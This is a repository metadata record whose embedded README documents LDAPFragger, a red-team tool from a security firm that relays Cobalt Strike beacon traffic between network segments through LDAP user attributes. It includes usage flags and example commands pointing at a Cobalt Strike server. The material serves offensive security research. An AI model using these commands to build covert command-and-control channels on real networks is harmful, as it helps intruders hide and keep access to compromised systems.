{"id":13840844,"url":"https://github.com/fox-it/LDAPFragger","last_synced_at":"2025-07-11T09:33:38.214Z","repository":{"id":54135758,"uuid":"248449889","full_name":"fox-it/LDAPFragger","owner":"fox-it","description":null,"archived":false,"fork":false,"pushed_at":"2020-03-19T10:13:44.000Z","size":75,"stargazers_count":190,"open_issues_count":0,"forks_count":28,"subscribers_count":11,"default_branch":"master","last_synced_at":"2024-08-05T17:26:00.295Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/fox-it.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-03-19T08:32:38.000Z","updated_at":"2024-07-16T02:28:14.000Z","dependencies_parsed_at":"2022-08-13T07:20:20.280Z","dependency_job_id":null,"html_url":"https://github.com/fox-it/LDAPFragger","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fox-it%2FLDAPFragger","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fox-it%2FLDAPFragger/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fox-it%2FLDAPFragger/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fox-it%2FLDAPFragger/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/fox-it","download_url":"https://codeload.github.com/fox-it/LDAPFragger/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225712758,"owners_count":17512477,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:58.004Z","updated_at":"2024-11-21T10:30:50.742Z","avatar_url":"https://github.com/fox-it.png","language":"C#","funding_links":[],"categories":["C# #"],"sub_categories":[],"readme":"# LDAPFragger\n\nLDAPFragger is a Command and Control tool that enables attackers to route Cobalt Strike beacon data over LDAP using user attributes.\n\nFor background information, read the release blog: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes\n\n\n## Dependencies and installation\n* Compiled with `.NET 4.0`, but may work with older and newer .NET frameworks as well\n\n## Usage\n\n```\n _     _              __\n| |   | |            / _|\n| | __| | __ _ _ __ | |_ _ __ __ _  __ _  __ _  ___ _ __\n| |/ _` |/ _` | '_ \\|  _| '__/ _` |/ _` |/ _` |/ _ \\ '__|\n| | (_| | (_| | |_) | | | | | (_| | (_| | (_| |  __/ |\n|_|\\__,_|\\__,_| .__/|_| |_|  \\__,_|\\__, |\\__, |\\___|_|\n              | |                   __/ | __/ |\n              |_|                  |___/ |___/\n\nFox-IT - Rindert Kramer\n\nUsage:\n     --cshost:  IP address or hostname of the Cobalt Strike instance\n     --csport:  Port of the external C2 interface on the Cobalt Strike server\n     -u:        Username to connect to Active Directory\n     -p:        Password to connect to Active Directory\n     -d:        FQDN of the Active Directory domain\n     --ldaps:   Use LDAPS instead of LDAP\n     -v:        Verbose output\n     -h:        Display  this message\n\nIf no AD credentials are provided, integrated AD authentication will be used.\n```\n\nExample usage:\n\n![](https://foxitsecurity.files.wordpress.com/2020/03/9.png?w=607) \n\n\nFrom network segment A, run\n```\nLDAPFragger --cshost \u003cCobalt Strike IP\u003e --csport \u003cExternal listener port\u003e\n\nLDAPFragger --cshost \u003cCobalt Strike IP\u003e --csport \u003cExternal listener port\u003e -u \u003cusername\u003e -p \u003cpassword\u003e -d \u003cdomain FQDN\u003e\n```\n\nFrom network segment B, run\n```\nLDAPFragger \n\nLDAPFragger -u \u003cusername\u003e -p \u003cpassword\u003e -d \u003cdomain FQDN\u003e\n```\n\n\nLDAPS can be used with the `--LDAPS` flag, however, regular LDAP traffic is encrypted as well. Please do note that the default Cobalt Strike payload will get caught by most AVs.\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffox-it%2FLDAPFragger","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffox-it%2FLDAPFragger","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffox-it%2FLDAPFragger/lists"}